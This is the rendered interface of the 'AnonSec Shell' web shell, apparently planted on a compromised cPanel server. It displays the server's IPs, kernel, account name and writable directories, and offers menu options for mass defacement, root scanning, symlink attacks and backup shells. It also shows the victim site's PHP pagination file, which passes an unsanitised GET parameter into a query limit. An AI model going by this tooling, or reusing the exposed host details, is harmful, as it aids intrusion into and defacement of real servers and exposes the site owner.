AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/include/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/include/ajax_predictwait_page.php
<?php include('../include72/class.php');?>
<?php
$max_rows = 4; // แสดงจำนวนแถวต่อหน้า
$page_number = $_GET['page_number'];
$all_array =  array('table'=>'leavenumber','where'=>'status	= 1  AND reply = 0');
$start_row = $page_number * $max_rows; 
$all_sql = $view_db->view($all_array);
$all_result = $view_db->q_re($all_sql);	
$total_rows = $view_db->q_nr($all_result);
$total_rows_num = mysql_num_rows($all_result);
$total_pages = ceil($total_rows/$max_rows)-1;
////////////////////////////////////////
$list = array('table'=>'leavenumber','where'=>'status	= 1  AND reply = 0','limit'=> "$start_row,$max_rows",'order'=> "ORDER BY id DESC");				  
$view = $view_db->view($list);
$result = $view_db->q_re($view);
$num_tr = 1;
$num = 1+($page_number*$max_rows);
while($row_lea = $view_db->q_ro($result))
{
    ?>
    <div class="row DivPredictLast">
      <div class="col-xs-3" style="padding:0px;text-align:center;"><?php echo imgprofile_shop('','66'); ?></div>
      <div class="col-xs-9">
        <div class="DivPredictLast-Ber">
        <a href="teller.php?id=<?php echo $row_lea['id'] ?>" style="color:#333"><?php echo $Phone_class->phonenumber_facecover($row_lea['phone'])?></a>
        </div>
        <a href="#" style="color:#333;text-decoration:none;">
        <div class="DivPredictLast-BerDtail"><?php echo $util_class->sub_str($row_lea['detail'],95)?></div>
        </a>
      </div>
    </div>
    <?php	 
}
?>
<div class="col-md-12 BerDedToday-page">
<?php
if($total_rows_num > 0)
{
      page_ajax($page_number,$total_pages,'ajax_predictwait_page.php','PredictM2');
}
?>
</div>


Anon7 - 2022
AnonSec Team